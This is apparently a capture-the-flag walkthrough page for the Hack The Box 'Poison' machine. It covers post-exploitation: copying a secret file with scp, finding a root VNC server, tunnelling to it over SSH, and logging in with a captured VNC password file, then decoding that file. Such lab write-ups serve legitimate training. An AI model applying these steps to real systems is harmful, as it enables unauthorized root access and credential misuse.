> For the complete documentation index, see [llms.txt](https://manuelvazquez-contact.gitbook.io/oscp-prep/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box/poison/post-exploitation.md).

# Post Exploitation

Copy the secret.zip to your current directory form charix.

```
scp charix@10.10.10.84:/home/charix/secret.zip .
```

The file required a password, using the password we found earlier, we can extract the file. We'll leave this for now

## Enumeration of system

```
ps -aux
```

This shows us that there is a vnc process running as root

![](/files/-MKjWjn5lF1ZU84F-aeN)

Viewing the entire process

```
 ps -auxww | grep vnc

charix@Poison:~ % ps -auxww | grep vnc
root   529   0.0  0.9  23620  8868 v0- I    14:20    0:00.03 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
charix 809   0.0  0.2  14828  2372  1  S+   15:13    0:00.00 grep vnc

```

rfbport is the port which vnc is listening on, which in this case is 5901.

We can verify with netstat

![](/files/-MKjXeIuOHMLGmvgfePT)

```
root@kali: ssh -L 5000:127.0.0.1:5901 charix@10.10.10.84
```

The above command allocates a socket to listen to port 5000 on localhost from my attack machine (kali). Whenever a connection is made to port 5000, the connection is forwarded over a secure channel and is made to port 5901 on localhost on the target machine (poison).

### Connecting to VNC

```
vncviewer 127.0.0.1:5000
```

Something cool about VNC is that you can you a password file to authenticate to the vnc server. We found a password file earlier, remember? Let's try that bad boy out.

```
vncviewer 127.0.0.1:5000 -passwd secret
```

![](/files/-MKjbUqq2cUnKFw_-Sfg)

You can actually decode that password file with the following github repo

{% embed url="<https://github.com/trinitronx/vncpasswd.py>" %}

```
python vncpasswd.py -d -f ../../htb/poison/secret
```
